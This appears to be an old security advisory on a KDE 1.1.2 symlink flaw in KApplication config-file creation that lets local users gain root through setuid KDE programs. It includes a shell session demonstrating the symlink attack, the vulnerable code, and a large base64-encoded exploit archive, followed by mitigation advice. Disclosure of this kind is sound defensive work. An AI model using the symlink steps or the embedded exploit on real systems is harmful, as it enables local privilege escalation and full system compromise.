COMMAND
KDE KApplication {} configfile
SYSTEMS AFFECTED
KDE 1.1.2 (SuSE 6.4, others?)
PROBLEM
Sebastian (TESO Security Advisory) found following. A bug within
the KDE configuration-file management has been discovered. Due to
insecure creation of configuration files via KApplication-class,
local lusers can create arbitrary files when running setuid root
KDE-programs. This can result in a complete compromise of the
system. The vulnerability is at least present within KDE 1.1.2.
All tests were performed on a SuSE 6.4 standard installation.
bash-2.03$ nl /tmp/a.out.cc
1 #include <string.h>
2 #include <stdlib.h>
3 #include <stdio.h>
4 #include <kapp.h>
5 int main(int argc, char **argv)
6 {
7 KApplication *base = new KApplication(argc, argv);
8 base->exec();
9 return 0;
10 }
11
bash-2.03$ ls -la /etc/foo
ls: /etc/foo: No such file or directory
bash-2.04$ ln -s /etc/foo ~/.kde/share/config/a.outrc
bash-2.03$ ls -la /tmp/a.out
-rwsr-sr-x 1 root root 19450 May 28 14:14 /tmp/a.out
bash-2.03$ /tmp/a.out
^C
bash-2.03$ ls -la /etc/foo
-rw-rw-rw- 1 stealth 500 0 May 28 14:26 /etc/foo
bash-2.03$
(Output formatted to improve readability).
An attacker may gain local root-access to a system where
vulnerable KDE distributions are installed. Due to the GUI-nature
of KDE, it might become difficult for an attacker to gain a
root-shell on a remote system. However, the individual could
modify the DISPLAY environment variable to redirect the output to
one of his own machines. A vulnerable system must have at least
one setuser-id program installed which utilizes the KApplication
class. Such programs include ktvision and ktuner, for an example.
Obviously, KDE doesn't check for possible symlinks when creating
configuration-files. This may result in arbitrary file-creation
or chmod's of any file. We assume the bug is within the
KApplication::init() function:
...
// now for the local app config file
QString aConfigName = KApplication::localkdedir();
aConfigName += "/share/config/";
aConfigName += aAppName;
aConfigName += "rc";
QFile aConfigFile( aConfigName );
...
This instanciation probably creates the file. However Teso hasn't
checked QFile {} further.
The bug-discovery and the demonstration programs are due to
Sebastian "Stealth" Krahmer. Further checking on different
distributions have been made by Scut.
Teso created a working demonstration program to exploit the
vulnerability. The exploit is available from
http://teso.scene.at/ or https://teso.scene.at/
http://www.cs.uni-potsdam.de/homepages/students/linuxer/
Here's mimed version:
---
Content-Type: application/octet-stream; name="kde11.tgz"
Content-Transfer-Encoding: base64
Content-Disposition: inline; filename="kde11.tgz"
Content-MD5: VKPUjTwG/L3LnSqTlXWc1Q==
H4sICFjFNzkAAHRlc28A7Vprd9s2Es1X8VcgSs+JnFgU9W6cR1eJFcdNbadRHtt2uw1EQiIq
kmAIULKak/3tOwOQEhXJzm7W65zdck7aUAA4GAxm7lyAUUyKOvXmXIpkWXeaTuPGlYvjdJx+
twt/a9F/93ud/Ldp6zebnW671ew3bzjNVq/fv0G6V2/KtqRS0YSQG4kQ6rJxChx1HfZcs6it
/T+hMzbhAbu6OUCr0+t0Ltz/Zrtr9r/V7jmtPozvtNudG8S5OhMulj/5/tMgOLAq7t27hNoi
VbbrkvpxQ8SqMfNYg0dukHoMm1KZNAI+brxXq9bVMGyH/+DRFQmzpSD14L2yKl97caV8Vrbz
P4+Dq5vjc/nfbnXW+d9pYf63Wr0y/69DbuXJ/ECqhEdT239kFds8yOutNi42m2Y0jrHFsnik
SEh5VMMHmkzdfeL64N87d+DHfM/6YBEtzwdxHHCXKi4icmdMJSMPScQWGx01o0C/ed/K3sSx
9UfsnLm1vfska0yYSpOIOPetjxaxvrZP/5dkO/9nPGgnVzoH8DmnD4TuX+B/zX4f2pvdDkAC
afXbXWem0ohdrT0b8ifP/+39v3qnI/73s33fsf/tVi/b/1ar3+n1EP87XafE/+uQWzc1sxvz
qBGzJLCsW9Ytsg6Bm+SVz4h5rvvUndkE+mvUntnUJhoqyEQkRIqQAQpTCXB+sKeVfA+eJYjT
qWI2OeJzJgmPwNtQGdDZ0mdBACo8j7ObMP54QkQULLPJCJdEAqpzr46DCY08Mk8D6KHjgBEq
yYIrH14bpaMh6dmdm3rStz6LiA+9ykcFKo25RxLqwhsRYZH3nR71OJ16XLpizpIlTuSljChB
RgyKi+Iw8nlC/ZAlNoz1lYoPGo3FYmG70k4jXo/Bdo+GNhBfH5Yd0ymTDZjKY5GSwIOj9Jwl
OA+8fZQwpiSaS4MFXUqc5tVwdLYPi3PThKulzeU+CWjYTv4gtm2TpUhhbADvziKxIAtfmCbg
1VqjZYVL8k3i4hENauY3w9M3H6rPzk6G1Y92tWEjHZdQcVnDFdGETxvGnYlbhQpqBr8YvHoG
gx9WD1YEHrYf++MEy3b10aMjBh4nE8ZgNVPYFnL0+vi21Jvgg1HadnCZz5basAcPyEgxGijf
/ltR0ROICIUafP47xE4duASuUY8RMewU+KH6qKHCuDEWIrTdKoFYgnggVeyumUbb3oPxRuXZ
gwe/Dc+e/na/SEiWsqGWMZOaguAoxUNWmwvY+juac1RcsDqqVVczSb+6Txz4A7wCOkPhbXX2
+t0u9qYR+GAG3Uy5jcCDw40dJywQ1KtiNzvnqtbcQ+KhDbPcQACZOSs4QYQxDy7wwjs8b8Gf
yYvjJ6TgCFIXhZ/iXTZS76xX7NkcKHHkLtdKf6dzsRlt2XJwa9PDOeVb0bs9klE5w+7oL79C
LH6oahwx/vt4X/ebHK6Bo/ExYVP8YRyP3YgPc1ajvzi/AtFbtxcJnbHnIscyYoCk6NGNZW94
SProoDSkcobKLbO7eT7dt+Qy1A27tnt/PSw34TiaixlubQGa4kRMExqSmsm8vdwwi09IDbBy
Bs57+BBWSiAw35lB77JI0gsmLICFQqcMGItrbQwzQNqA3Nsn7wDPxISs3vq4sdvbNq+2/Fnq
f0ee0Oi2IvqFbIC93nhSLcYRtK8c/m5dIqiUCw9deIsEgBFgcSDEjAR8xgisb8EAfOewJYAE
CHWesLEc6IWQdj5V9S0LXEBOG4BYrbHxgDwePhu8Gd7U7oKsVizcTEvwxNeul/9vchH/gwY4
gV3NHJ/jf22889P8r9NtdTX/d5xuyf+uQy7hfyYEcgZofq044H9E8IyuL6N410ff/gvkbRQz
l9OATI1m0Kd8qsiY0VTxSRqQcYAMwUuYlFDnFyKE1VAFbwLXIuMUKa2IbdgSWLaIGK4e6TdM
ooH2S+ih2YySIJYEsSSI100QTe59liKaYf8+SVy9V9LEUnbLNv/barHV+aXM6LNy+fefptN1
mhn/63WcZhvG97rtkv9di9RRHg+Pjk/Ji6MXZHR8dDo8JCfD0WhwNNSd1jMq/QMyejZoWpZV
J3XTaiETAs5liBAZZAFjtWBLG0630bpnWc8Ph5tfej58JIZ3aHqSYyIUP7UE3aM0DCmoeLgt
5uvPACjQVLNCHmlGhBMYhWmiZ6hrxcCagNWFQOj0XeCYsUi/n7NG5tn696EhjkBaDV9xNR0B
OwE9N9QSVCvJnNON9dTdAJBu33yFCoQLzC5IJUskcYG3aW3AY5MxVwmsK1OywCvKJI0iLAum
+mm6bLTAiupZgZDGSM31UB+QwjQAMAVGCNaFMSAr0w+JCDlAMBiNPjGIaKM/9ZMkg8mEuYp5
FzsWKf7GbiCxBGIaMGDUWAQk+jJzPDq9aTftlrFvAEUHkgPo7AI8S+AUARUsBBIi0NCcuxM8
F3g08cwRIQi0A9HKV/jubtMqQOj9est22t+QKDBFOv88bVX0l79mZdcXTNPXquz6kmn62pUd
7MV0dSq7vmyavm7lc184zbhe5UP21K98+RdP8+q3lR1fPrO+e5VPP4DqhqZT+Zg9NTe8GEhS
DyjRFGAihFUJoJ7mvw7IqSAydX0dqYYTJBA5mNZrLR3QEgHTXL1G/rHjXKG3KXF3Tr7aRqtS
TxYyqcOfc7TV5IFeT/6Azfc6XYec0CVpfUuanYNmZ0NFYYJi89+fWJevHKbO/uippTmfwBY7
DilKcepWr6BgrdwkUe0sVTEwFQx/qiDfNLZges71txEvy609jPrjMKauugTq8Nyn4DTAEgi3
JZlCyGUQg76pU9eFMyLOQLOMR2BJWJFoQqLmsAeZMU4xwiSex/Ic/AQHET3gHFePqEI0BDwB
DfvI3kI+9fGYinQM1E0m3EUowqMnXRuqdYEebSs1dhruraEgYaFQK3wiz8SCARbv62l55PE5
91JYnivSwDNgCMcuPlnqAYfHoxc/DH4iLJrzREQa2+c04XqhMCdguo5VPViYjYBmPCNrVbAY
fWZeROBOF2CMZfA6KHos82SINxuaoa4wEBUhWAO61wGwM4jWGlbOhB3gkDzg54D/waSpUMW0
1+XCTDvCNMuBnuR4s7oawYO0ueTdz73MziliPgbP8DwOoMShzosj6Gw85yKVwXJfI7YnmERa
7/rMnWmdsZCSm1XrM01WmtzsTG5Ob1vFVWa3DxiUhYq0UeTq60KakOwUCHt5W+I20MgMMn54
ixc9Mg1ZdsMxxcpTrPAF/x0c8AgO03tkkkaubtAq9P/gCLX+0WgQvH7BRaIOkzaA5Nly9PR6
4I8jXTIIfaI7TmmIqLw5p34b8A3iq5YdPovD7z6EE9EG9FV3DqKgFJ93azDXL9qkp4i9WT8+
1zYGZxbgcq01PTDXbi43ToewGkM4LzMGYgJRuzxPuvwEtgoIIAfryYGlTdIEXkrsSgV5hAjS
y2PtlHEcjrRGBxtdOzC/44MdSfARzvf2inPowASDAjhsAmvSKYdsDRZkSIQN+RlTBbkifY0L
Y2R3kCl0Tnmgc9bcIgggE+R1DOnk6atDJEWxAh/gcxbo6LKBizdzkKxThJBt3rHmQxCL9fU1
IyYkutEDEANnJytPmwRGUDXXkCa7V1eR1ezeq5pfSpJfmr8aBzw1PjYbkF2jIbYCigO4bYL2
2jO4ev36eElGLlChQhjkpzaywMtT4OUKXsBxK3NwGdlbFkQV4LYix5GpWJfuMHpEM36IqYWm
o2Nd1MB4D6cASqSvsLCMwEnpL/gPQb00jG333Kz2LMWoGxO8b83YZXY3i+Nt6bKI2VQ11lmc
eU4jTWEy5ScinfrGj5b1kmmHQTW82HgY+qUXwY1MQ+tXvXyrsstohDlsl9ursaxDiKGActj6
y7xb3D2EakgXRfR76NIxWzN+BDXdkkod/6Y8LLWeOE0g2CHPh9LcNEMC8PX2EjoWqSmRW0VP
Zn7OShrwC0R9Pd0CCu7U1iEgU8xs2AUGJUgAM+DG0twi6EF7Qgrpj9WnaBUclMaGHhEIDYMO
gMt5r/44sDOa8ZI7YWal+laqmBtYfdJIMwVuZg+zwp4o7gYa/ajSCYoEWh9Lii6ZAFCYfy2y
mi+Dmqwom8Odro8YR5hBEA15GQYfXLytb9nteXaqhIkpWYhEJ/pOEEEf5l5Vn57H7HUWFjy/
BkFcRf4vJHfn1WUxqitS5H2q4AtyZX0/sONiYfDq9cvsTuENwD1WV3IUpS+OyLxpO7ZDaken
rxs/oLI9QKcQEfqAPAXDccOgeLCiZdMojae2SKaWxQ+/PXz847B78nb6g/vzz3cf//7cW/zu
vhy8/34y+H5x0p3JeaPlhf2AD0cvToKfZj+y+c/uhA+eTMad7rHl/DVu3JudvEyaT1+dvOkl
znv/bkDFQ+th733bM2sZnh7uWsnXvsAppZRSSimllFJKKaWUUkoppZRSSimllFJKKaWUUkop
pZRSSsnkn5MvgAYAUAAA
-----
SOLUTION
Neither run KDE applications setuid nor setgid. The KDE
developers have been informed. A patch should be made available
soon. Upgrade as promptly as possible.